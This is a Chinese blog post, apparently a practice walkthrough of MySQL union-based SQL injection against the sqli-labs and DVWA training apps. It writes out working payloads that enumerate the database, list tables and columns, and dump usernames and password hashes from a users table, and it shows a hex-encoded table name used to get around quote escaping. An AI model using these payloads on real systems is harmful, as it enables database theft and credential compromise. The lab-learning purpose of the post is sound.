首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL基础(二)
Apr 05 MySQL
MySQL 视图(View)原理解析
May 19 MySQL
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 MySQL
MySQL完整性约束的定义与实例教程
May 30 MySQL
MySQL中in和exists区别详解
Jun 03 MySQL
Mysql systemctl start mysqld报错的问题解决
Jun 03 MySQL
深入解析MySQL索引数据结构
Oct 16 MySQL
mysql事务隔离级别详情
Oct 24 MySQL
Mysql数据库表中为什么有索引却没有提高查询速度
Feb 24 MySQL
一文搞清楚MySQL count(*)、count(1)、count(col)区别
Mar 03 MySQL
面试中老生常谈的MySQL问答集锦夯实基础
Mar 13 MySQL
MySQL池化框架学习接池自定义
Jul 23 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
React(6) i7 6700(1) 对讲机(1) win10(43) R72E(1) i5 9400(1) win11(40) ipad(1) GTX1660(1) i5 10400(1)
You might like
codeigniter框架The URI you submitted has disallowed characters错误解决方法
2014/05/06 PHP
ThinkPHP之用户注册登录留言完整实例
2014/07/22 PHP
PHP实现上传图片到数据库并显示输出的方法
2018/05/31 PHP
在vs2010中调试javascript代码方法
2011/02/11 Javascript
利用JS自动打开页面上链接的实现代码
2011/09/25 Javascript
js有关元素内容操作小结
2011/12/20 Javascript
JS实现至少包含字母、大小写数字、字符的密码等级的两种方法
2015/02/03 Javascript
js实现鼠标点击文本框自动选中内容的方法
2015/08/20 Javascript
基于AngularJS+HTML+Groovy实现登录功能
2016/02/17 Javascript
jQuery通过deferred对象管理ajax异步
2016/05/20 Javascript
JS中动态创建元素的三种方法总结(推荐)
2016/10/20 Javascript
web打印小结
2017/01/11 Javascript
jQuery实现链接的title快速出现的方法
2017/02/20 Javascript
Node.js Buffer用法解读
2018/05/18 Javascript
javascript实现计算指定范围内的质数示例
2018/12/29 Javascript
vue使用prop可以渲染但是打印台报错的解决方式
2019/11/13 Javascript
JQuery通过键盘控制键盘按下与松开触发事件
2020/08/07 jQuery
python实现哈希表
2014/02/07 Python
python学习笔记:字典的使用示例详解
2014/06/13 Python
python入门之语句(if语句、while语句、for语句)
2015/01/19 Python
python使用xlrd实现检索excel中某列含有指定字符串记录的方法
2015/05/09 Python
简单理解Python中的装饰器
2015/07/31 Python
pyqt5实现俄罗斯方块游戏
2019/01/11 Python
Python制作微信好友背景墙教程(附完整代码)
2019/07/17 Python
详解Python文件修改的两种方式
2019/08/22 Python
Python实现word2Vec model过程解析
2019/12/16 Python
tensorflow之tf.record实现存浮点数数组
2020/02/17 Python
python如何运行js语句
2020/09/09 Python
Numpy数组的广播机制的实现
2020/11/03 Python
Stylenanda中文站:韩国一线网络服装品牌
2016/12/22 全球购物
英国最大的滑板品牌选择:Route One
2019/09/22 全球购物
土建专业毕业生自荐书
2014/07/04 职场文书
销售活动策划方案
2014/08/26 职场文书
公务员廉洁从政心得体会
2016/01/19 职场文书
MySQL中几种插入和批量语句实例详解
2021/09/14 MySQL
Win11局域网共享权限在哪里设置? Win11高级共享的设置技巧
2022/04/05 数码科技